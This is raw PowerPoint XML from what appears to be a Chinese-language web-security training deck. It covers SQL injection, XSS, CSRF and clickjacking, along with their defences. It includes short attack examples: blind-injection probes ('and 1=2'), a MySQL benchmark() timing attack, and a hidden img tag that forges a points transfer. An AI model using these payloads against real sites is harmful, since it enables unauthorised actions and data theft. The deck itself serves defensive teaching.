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4" r:id="rId3"/>
    <p:sldId id="300" r:id="rId4"/>
    <p:sldId id="304" r:id="rId5"/>
    <p:sldId id="314" r:id="rId6"/>
    <p:sldId id="301" r:id="rId7"/>
    <p:sldId id="315" r:id="rId8"/>
    <p:sldId id="316" r:id="rId9"/>
    <p:sldId id="306" r:id="rId10"/>
    <p:sldId id="317" r:id="rId11"/>
    <p:sldId id="302" r:id="rId12"/>
    <p:sldId id="309" r:id="rId13"/>
    <p:sldId id="310" r:id="rId14"/>
    <p:sldId id="311" r:id="rId15"/>
    <p:sldId id="308" r:id="rId16"/>
    <p:sldId id="303" r:id="rId17"/>
    <p:sldId id="313" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="282" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="257" r:id="rId22"/>
    <p:sldId id="258" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="259" r:id="rId25"/>
    <p:sldId id="260" r:id="rId26"/>
    <p:sldId id="262" r:id="rId27"/>
    <p:sldId id="263" r:id="rId28"/>
    <p:sldId id="266" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="269" r:id="rId31"/>
    <p:sldId id="319" r:id="rId32"/>
    <p:sldId id="320" r:id="rId33"/>
    <p:sldId id="270" r:id="rId34"/>
    <p:sldId id="271" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="295" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="318" r:id="rId42"/>
    <p:sldId id="321" r:id="rId4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04" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="92" d="100"/>
          <a:sy n="92" d="100"/>
        </p:scale>
        <p:origin x="-21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5FF20-48D0-4E41-BC82-96ED0D94FF0D}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2014-02-20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14812-4BC2-4EED-AE00-C14761E7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5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盲注： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://aa.com/item.php?id=2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后面添加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>and 1=2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>如果出错 改成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>如果成功说明可注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>timing attack : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>对于想要获取的数据进行猜测，如果猜测正确则利用固有循环函数循环多次，延长反馈时间以达到猜测目的。比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>（）函数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14812-4BC2-4EED-AE00-C14761E78FE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3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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特殊字符转义 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用在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传入数据库对象，例如传入表名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${columnName}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14812-4BC2-4EED-AE00-C14761E78FE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2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。查询数据库，读写硬盘文件，会占用较多资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$sql=“select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t> * from post where tagid=‘$tagid’order by postid desc limit $start,30” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>表数据庞大，翻页频繁，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>$start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>数字急剧增加，查询影响结果集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>=$start+30;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>该查询效率呈现明显下降趋势，而多并发频繁调用，因查询无法立即完成，资源无法立即释放，会导致数据库请求连接过多，导致阻塞。或者是频繁写操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>在大流量网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>siteA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" smtClean="0"/>
              <a:t>上插入一段代码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" smtClean="0"/>
              <a:t>&lt;iframe src=“http://target” height=0 width=0/&gt;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14812-4BC2-4EED-AE00-C14761E78FE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8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us logistics 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620713"/>
            <a:ext cx="8208963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205038"/>
            <a:ext cx="8207375" cy="863600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C2A2D0-88EE-4C2F-836D-567173EF10A0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9EEB3-FF83-4368-AE57-D4197ED94B7C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0063" y="188913"/>
            <a:ext cx="2259012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25" y="188913"/>
            <a:ext cx="6624638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0A6C9-D592-48E5-A118-A600099BAE5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134FC-EEF2-4A32-90AD-C305CC300F1B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5B60A-8552-4B6A-BC3B-5794430DD456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25" y="836613"/>
            <a:ext cx="4441825" cy="528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836613"/>
            <a:ext cx="4441825" cy="528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AA08E-36DA-4A06-8551-F14ADB9D83F2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A2A54-8316-443A-9989-71C9BF91011A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44821-80D1-4579-A364-8B3DE56E834B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A9214-CF68-4A92-A867-624C208D2BD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7AA56-C0C2-4247-821A-0990EEA0F1AD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32D6C-A908-47BA-B010-A59AE8A8745F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us logistics SLID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" y="836613"/>
            <a:ext cx="9036050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188913"/>
            <a:ext cx="74168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16238" y="6337300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47025" y="6337300"/>
            <a:ext cx="1162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ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{911EB765-E175-49D0-A397-4BC13B54575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Cross-Site_Request_Forgery_(CSRF)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Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_She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wasp.org/index.php/Category:OWASP_CSRFGuard_Projec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Category:OWASP_AntiSamy_Proj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2cto.com/Article/200902/31795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Cross-site_Scripting_(XSS)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XSS_Filter_Evasion_Cheat_She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Category:OWASP_AntiSamy_Proj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wasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_She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485" y="1814959"/>
            <a:ext cx="8208963" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="8000" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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40770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安全小组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、跨站脚本攻击（XSS）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>1.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t> 使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>AntiSamy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示例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69723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078297" y="1412776"/>
            <a:ext cx="3960440" cy="15121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dirty="0" smtClean="0"/>
              <a:t>pom.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>-------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>dependency&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>      &lt;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  <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>org.owasp.antisamy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      &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" u="sng" dirty="0" err="1"/>
              <a:t>antisamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" u="sng" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" u="sng" dirty="0" err="1"/>
              <a:t>artifactId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" u="sng" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>      &lt;version&gt;1.5.2&lt;/version&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>    &lt;/dependency&gt;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1539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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"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ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>跨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>站点请求伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（Cross Site Request Forgery，CSRF）是指Web应用对URL保护不够，只要用户已经登录（认证），就能够简单的发送http请进行业务操作。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4209928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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>2.2  攻击流程示例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（1）某博客系统A在用户已经登录时，可以使用以下URL进行积分赠送：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FF3300"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>http://blog.a.com/curUser/score?transTo=zhang3&amp;amount=100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>         如果该系统还允许用户“一个月内免登录”，则用户成为受害者的几率更大些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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（2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>）攻击者B发现了这个漏洞，并在多个网站（含系统A）上发表文章/评论：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FF3300"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>&lt;img style="height:0px; width:0px;" src="http://blog.a.com/curUser/score?transTo=b&amp;amount=100" /&gt;楼主帖子文笔流畅，修辞得体，深得魏晋诸朝遗风，更....</a:t>
            </a:r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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>3）结果：该文章/评论的访问者如果也同时登录了系统A，则就会触发该积分赠送操作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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4290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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>2.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>防范CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty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（1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>）使用Synchronizer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Token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这</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>也是最常用的方式，也通常用于防止二次提交。原理是：服务器返回用户操作表单前，现在session中生成一个随机的Challenge Token，并将该token作为隐藏项保存在向浏览器返回的form中（或URL链接中），当用户提交form或点击链接后，将提交的token与session中的做对比，一致才允许业务继续</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>模式可以从以下方面再加强：token的名称也能够随机；将一个session一个token强化为一个request一个token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>：该模式通常会影响使用性。比如无法使用浏览器的后退按钮，因为后退画面中的token可能已经过期。无法同时打开多个操作画面，因为最后打开的画面会覆盖前一个画面在session中保存的token值，造成前一个打开的画面提交时会失败</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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参考：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  <a:hlinkClick r:id="rId4" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>OWASP CSRFGuard</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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575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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>跨站点请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>伪造（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>2）使用CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（3）重新认证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zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>指对RememberMe登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>后，可以进行普通的业务操作。涉及到敏感的业务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>操作要强制用户重新输入用户名密码进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>认证。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty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charset="-122"/>
              </a:rPr>
              <a:t>（4）使用one-Time token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举例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>绑定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>的手机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>一次性的验证码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（5）针对Flash：合理配置 crossdomain.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（6）检查HTTP头：Referer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（7）检查HTTP头：Origin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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798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、点击劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（ClickJacking）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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>3.1 定义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>攻击者使用某种途径将透明的HTML内容定位到其他HTML内容上方，当用户以为点击的是看到内容时，实际上是被攻击者拦截，并进行其他恶意操作。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="584345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、点击劫持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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>3.2 防御方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>（1）为自己的HTML页面设置HTTP响应头 X-Frame-Options，以禁止被攻击者将其作为iframe内容显示在其他网站上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>。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zh-CN" altLang="en-US" sz="2000" dirty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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>该HTTP响应头的值有 DENY、SAMEORIGN、ALLOW-FROM url这三种方式。现代的浏览器都支持前两个，大多尚不支持第三种值。</a:t>
            </a:r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不足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>之处是：需要为每个页面进行设定；多域名、有子域名时设置繁琐；代理服务可能会删除该HTTP消息头而造成保护失效。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4209928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、点击劫持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（2）到目前为止，对老浏览器最好的处理方式是在每个页面中都引入以下代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>：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>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>）另外需要注意：如果允许用户输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>，则应该禁止其使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>z-index </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
